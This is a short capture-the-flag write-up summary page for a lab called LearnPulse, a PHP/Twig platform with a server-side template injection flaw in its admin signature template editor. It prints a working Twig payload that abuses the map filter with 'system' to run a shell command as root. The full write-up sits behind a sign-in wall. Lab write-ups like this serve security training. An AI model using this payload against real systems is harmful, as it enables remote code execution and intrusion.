webProeasy

Lab 130 — LearnPulse — SSTI in Signature Template Engine

hackadvisor

Task: PHP/Twig learning platform with admin Signature Template editor vulnerable to SSTI. Solution: Injected {{ [\"cat /root/flag.txt\"]|map(\"system\") }} via Twig map filter callback to achieve RCE as root.

$ ls tags/ techniques/
map_filter_callbackssti_twig_rcetwig_map_system_rcephp_array_map_callback

🔒

Permission denied (requires tier.pro)

Sign in to access full writeups

Sign in with GitHub to continue. No email required.

$sign in

$ grep --similar

Similar writeups